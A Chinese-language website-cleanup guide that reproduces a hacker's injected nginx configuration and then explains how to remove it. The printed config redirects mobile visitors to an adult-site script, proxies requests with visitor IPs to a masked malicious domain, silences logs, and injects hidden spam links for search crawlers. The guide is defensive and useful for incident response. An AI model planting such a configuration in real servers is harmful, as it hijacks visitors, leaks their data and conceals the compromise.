下面是黑客窜改的代码：

location ~* /.*am.* {

set $mobile 0;

if ($http_user_agent ~* '(Android|webos|iphone|ipad|ipod|blackberry|iemobile|opera mini)') {

set $mobile 1;

}

if ($http_user_agent ~* 'Baiduspider') {

set $mobile 0;

}

if ($request_uri ~* ".*am.*") {

set $mobile "${mobile}1";

}

if ($mobile = "11") {

add_header Content-Type "text/html";

return 200 '<!DOCTYPE html><html><head><meta charset="utf-8"></head><body><script src="被挂上的HS网站.js"></script></body></html>';

}

rewrite ^ /news.php?lj=$request_uri&hh=$remote_addr&ym=$host break;

proxy_pass http://mulucdn1.XXXXXXX.com;

proxy_set_header Host mulucdn1.XXXXXX.com;

proxy_set_header X-Real-IP $remote_addr;

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

proxy_set_header REMOTE-HOST $host;

access_log /dev/null;

error_log /dev/null;

}

set_by_lua $pkac '

local rank_str = [[<div style="width: 2px; height: 2px: 0;display: none !important;visibility: hidden !important;">]]

local huozui = {".shtml",".html"}

local pdir = {"amxw"}

local ldir = {"news","show","info","read","list"}

math.randomseed(os.time())

for i=1,10 do

rank_str=rank_str..[[<a href="/]]..pdir[math.random(#pdir)]..[[/]]..math.random(100000, 99999999)..huozui[math.random(#huozui)]..[["></a>]]

end

rank_str=rank_str..[[</div>]]

local useragent = ngx.var.http_user_agent

local req_uri = ngx.var.request_uri

if string.find(req_uri, "fy") then

return ""

end

if ngx.var.spider == "01" or ngx.var.spider == "012" then

return rank_str

else

return ""

end';

sub_filter '</head>' '${pkac}</head>';

你提供的这段代码，就是直接导致网站跳黄色网站的恶意配置！里面藏了多个 “陷阱”，咱们一点点拆穿，然后彻底删除：

一、先看懂这些恶意代码在做什么（3 个关键陷阱）

1. “条件跳转陷阱”（专门针对手机用户）：
2. nginx
3. # 当访问的URL包含"am"（比如xxx/amxxx），且是手机访问时 if ($mobile = "11") { # 直接返回那段带恶意脚本的HTML（就是你看到的跳转代码） return 200 '<!DOCTYPE html><html>...<script src="https://upload.XXXXX.com/a78.js"></script></body></html>'; }
4. 这就是为什么手机访问时会跳黄色网站的直接原因！
5. “偷偷转发陷阱”：
6. nginx
7. proxy_pass http://mulucdn1.XXXXXX.com; # 把请求转发到恶意域名 proxy_set_header Host mulucdn1.XXXXXX.com;
8. 即使不触发上面的条件，也会把访问偷偷转发到恶意网站，相当于 “双重保险” 让你跳走。
9. “页面污染陷阱”（用 Lua 代码插入垃圾链接）：
10. 那段set_by_lua代码会在网页里偷偷插入大量隐藏的恶意链接（比如/amxw/123456.html），目的是污染你的网站内容，甚至可能被搜索引擎惩罚。

二、解决步骤：彻底删除这些恶意代码（按步骤来，超简单）

这些代码肯定藏在某个 Nginx 配置文件里（之前提到的extension文件夹里的.conf，或uwsgi_params.conf），按下面步骤找出来删掉：

第一步：找到包含这些恶意代码的文件

1. 打开宝塔→「文件」；
2. 按之前的路径找最可能的地方：优先查：/www/server/panel/vhost/nginx/extension/www.*****你的网站网址***.com/（里面的所有.conf 文件）；其次查：/www/server/nginx/conf/uwsgi_params.conf（之前日志报错的文件）；
3. 每个文件点「编辑」→按「Ctrl+F」搜 “XXXXXX.com”（一秒定位恶意代码）。

第二步：删除所有恶意代码（关键！别留任何一句）

找到包含上面代码的文件后，删除以下所有内容：

1. 整个location ~* /.*am.* { ... }块（从location ~* /.*am.* {开始，到对应的}结束，包括里面的所有代码）；
2. 整个set_by_lua $pkac '...';行（就是那段带 Lua 代码的长句子）；
3. 最后一行sub_filter '</head>' '${pkac}</head>';（这行在偷偷改你的网页内容）。

删完后，文件里应该看不到任何 “XXXXXX.com”“XXXX.js”“XXXXXXX” 相关的内容。

第三步：保存并重启，验证效果

1. 删完后点「保存」；
2. 宝塔→「服务」→重启「Nginx」和「PHP-8.2」；
3. 用手机「无痕模式」访问之前的 CSS 链接，以及任何带 “am” 的 URL（比如假设你的网站有xxx/amxxx路径）：正常情况下，会显示你的网站内容，不再跳黄色网站；查看网页源代码（手机浏览器里点「查看源代码」），也不会有<script src="https://upload.XXXXXX.com/a78.js"></script>这段代码了。

三、最后检查：确保没有漏网之鱼

黑客可能在多个文件里加了类似代码，再做一次全局搜索：

1. 宝塔→「文件」→进入你的网站根目录或 Nginx 配置目录；
2. 点「搜索」→搜内容 “XXXXXX.com”→范围选 “所有子目录”；
3. 任何搜到的文件，都按第二步的方法删除恶意代码，确保彻底清除。

这些代码就是导致跳转的 “罪魁祸首”，只要彻底删除，问题就能解决！如果找不到文件或不确定删哪些，截个图把文件内容发给我，我帮你标出来～